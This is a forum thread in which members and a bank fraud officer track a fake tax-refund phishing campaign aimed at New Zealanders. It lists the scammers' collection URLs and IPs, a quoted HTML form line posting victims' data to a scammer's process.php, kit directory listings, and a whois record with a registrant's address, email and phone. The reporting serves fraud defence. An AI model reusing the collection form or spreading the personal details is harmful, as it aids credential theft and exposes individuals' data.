IRD warns of fake tax email

Phishing scams, hijacking of TM accounts, keyloggers and all manner of other nasties. This is the place to report them and get help if you've been hit.
User avatar
Rob@BNZFraud
Members
Posts: 5
Joined: Thu Dec 30, 2010 9:19 pm
First Name: Rob

Re: IRD warns of fake tax email

Post by Rob@BNZFraud » Thu Dec 30, 2010 10:05 pm

Hi all,

Peter and I spoke earlier in regards to this issue and I thought it best to log on and say hi. As I mentioned to Peter, we have been aware of this scam for some time and have been monitoring the same information posted earlier in this thread for about a day now.

That said, big thanks to Peter and all of you for actually doing something about this scam! We love having allies in the community, especially those with technical knowledge and a bit of drive to make the world a better place. If we hadn't already been aware of this issue, Peter's call would have been even more warmly recieved.

I would make one request though. Could one of the admins please edit the cardholders personal details/card numbers out of this thread and also remove the link to the source of this information? I don't mean to be a wet blanket, but the privacy implications of having cardholder details exposed in public is obvious, and while I'm certain that no members of this website would use these details for less-than-honorable purposes, having this data duplicated in as few places as possible would make us all feel a little more relaxed. We have already taken steps to restrict transactions on the accounts in question, so really just trying to cover all bases.

Many thanks,

Rob @ BNZ Fraud

EDIT: The file has disappeared :( If anybody finds out the new location it is stored at, please PM me. You can also call 0800 933 399, which will come through to the Fraud team.

User avatar
digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago
Contact:

Post by digidog » Fri Dec 31, 2010 2:11 am

Hi Rob, it's always nice to get some feedback and encouraging to find that someone
in authority is actually taking action against this sort of scam. We've contacted banks
in the past about phishing scams and found they're not really that interested.

While the text file of victims appears to be missing in action, have a poke around the
other directories on the scam site. There are still forms waiting to be used in their
next scam.

And I've removed all of the victims' personal details as requested.

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Fri Dec 31, 2010 2:51 am

This is not the first IRD scam.

The last one used an attachment as a form (which I still have), with submission going straight to the form handling script in a compromised site. Much harder to stop as there is unlikely to be a browser warning of impending doom.

Scammers are smart in finding ways to relieve folks of their hard earned!
Google, the answer to so many questions!
-----------------------------------------------------

abc
Members
Posts: 4
Joined: Wed Dec 29, 2010 9:27 pm
First Name: Josh

Re:

Post by abc » Sat Jan 01, 2011 9:02 pm

digidog wrote: While the text file of victims appears to be missing in action, have a poke around the
other directories on the scam site. There are still forms waiting to be used in their
next scam.
http://216-31-226-228.static-ip.telepacific.net/" onclick="window.open(this.href);return false; doesn't load atall for me?

User avatar
digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago
Contact:

Re: Re:

Post by digidog » Sat Jan 01, 2011 9:53 pm

abc wrote:... doesn't load at all for me?
It's very slow loading but two directories containing phishing files are still online. If
you are viewing any files there be careful. The file process.php starts opening
multiple windows!

ionet
Members
Posts: 2160
Joined: Fri Feb 18, 2005 2:33 pm
Location: Hawkes Bay

Re: IRD warns of fake tax email

Post by ionet » Sun Jan 02, 2011 2:53 am

_

My gut feeling is that although a Russian based or hosted phishing site has been mentioned, this chapter of IRD phishing & identity theft Scams might infact be Romanian originated instead :?:

The Scammers after all have a long established database of contacts from NZ Auction site scams & account takeovers, notably on Trade Me originating back to at least 2006.

For Trade Me users to be receiving emails suggests what ?

The scam appears to be very much focused on NZ web users and perhaps DIICOT have some further Romanian tidy up work to do in their local camp after their joint FBI clean up during mid-2010 fixed an eBay problem ?


M
Ultimate Auction Security: Kick 'em in the pants & sweep them under the carpet fast before anyone sees & hope they go away.

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Wed Jan 05, 2011 9:28 pm

The latest phish has been sent to me. This involves an HTML attachment that opens with the standard phish form.

Form goes to <FORM action="http://wjutw2.com/process.php" method="post" name="date" autocomplete="off"> for form processing.

Whois

Admin Name........... Peggy Green
Admin Address........ 777 cherrytree rd apt g113
Admin Address........
Admin Address........ aston
Admin Address........ 19014
Admin Address........ pa
Admin Address........ UNITED STATES
Admin Email.......... greenpeggy98@yahoo.com
Admin Phone.......... +1.4031923912
Admin Fax............

Appears to be an empty domain at present.
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago
Contact:

Post by digidog » Thu Jan 06, 2011 9:08 pm

Here's news of a variation of the scam - using taxrefunds.co.nz as the bait.

http://www.stuff.co.nz/national/crime/4 ... email-scam" onclick="window.open(this.href);return false;

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Sun Jan 09, 2011 4:03 am

Latest IRD phish hot off the web.

This comes with a link to http://melaka.rmp.gov.my/a/ird.govt.nz/ ... /form.html" onclick="window.open(this.href);return false;

There are also two more links in this site as below.
http://melaka.rmp.gov.my/b/ird.govt.nz/ ... /form.html" onclick="window.open(this.href);return false;

http://melaka.rmp.gov.my/c/ird.govt.nz/ ... /form.html" onclick="window.open(this.href);return false;

The form is in a frame, and points to http://221.151.55.226/nz1/process.php" onclick="window.open(this.href);return false;. This directory contains

[TXT] d1n.txt 09-Jan-2011 12:14 10
[ ] process.php 09-Jan-2011 11:15 953
[TXT] refundForm.htm 09-Jan-2011 11:14 24K

din.txt is empty as at this time.
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Sun Jan 09, 2011 11:24 pm

This site was flagged as a web forgery this morning. Is not showing as such at work (may be an out of date browser).

I see the txt file is collecting again (was missing entirely this morning). I believe the scammer has revamped this completely as the look today is quite different, as is the information requested. Today extra details are cc number and cc limit. Also the bank. This is now an extensive identity theft with data checking built in (including DL check and CC validity check) a much more sophisticated attempt.

Advised our BNZ contact of the fact that it was alive and well now.
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
Rob@BNZFraud
Members
Posts: 5
Joined: Thu Dec 30, 2010 9:19 pm
First Name: Rob

Re: IRD warns of fake tax email

Post by Rob@BNZFraud » Sun Jan 09, 2011 11:51 pm

Thanks for the heads-up Peter. Will get the information out to the other banks now. It seems the fraudsters have just gone back to work today with everyone else, so have been a touch busy. ;-)

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Mon Jan 10, 2011 7:58 am

This is a really interesting ongoing phish

The "a" address above is still operating with the updated phish. Earlier today this was showing as a web forgery.

The "b" listing is currently showing as a web forgery.

The "c" address is operating normally, with the updated phish.

The phish page is downloading from IP 210.117.136.82 which is a Korean IP. There does not appear to be much activity with the d1n.txt file, and I suspect the information may now be being diverted to the Korean address. In any event the address where this is stored is currently being flagged as a web forgery.

The phish page is also very interesting, with obfuscated javascript, as does the php file. All in all, very strange how it continues to operate.
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Re: IRD warns of fake tax email

Post by Foggyone » Tue Jan 18, 2011 7:18 pm

The latest IRD phish has arrived. It points to http://d41buc.com/processor.php" onclick="window.open(this.href);return false; and the refund amount promised is a paltry $84.00

The form is handled by an attached HTML file.

Rob advised
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
Foggyone
Site Admin
Posts: 9880
Joined: Sat May 22, 2004 8:16 pm
First Name: Peter
Location: Lower Hutt
Contact:

Another One

Post by Foggyone » Sun Jan 23, 2011 11:30 pm

Text supplied as an image from http://img508.imageshack.us/img508/3940/73942797.png" onclick="window.open(this.href);return false;

Image

Sending IP 209.55.199.93 is (oops!)

OrgName: Coca-Cola Enterprises, Inc.
OrgId: COCACO-3
Address: P. O. Box 723040
City: Atlanta
StateProv: GA

The form is an attachment (again) to make it harder to track down the receiving file which is at http://ngu21s.com/" onclick="window.open(this.href);return false;.
Receiving file is processor.php which is the same name as before. Unable to access the file of accumulated phishes.
Google, the answer to so many questions!
-----------------------------------------------------

User avatar
digidog
Site Admin
Posts: 15014
Joined: Wed May 05, 2004 2:25 am
First Name: Alfie
Location: Otago
Contact:

Post by digidog » Mon Jan 24, 2011 12:15 am

The ngu21s.com site was only registered three days ago, for this specific
purpose you'd imagine. The registrant details are probably bogus.

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest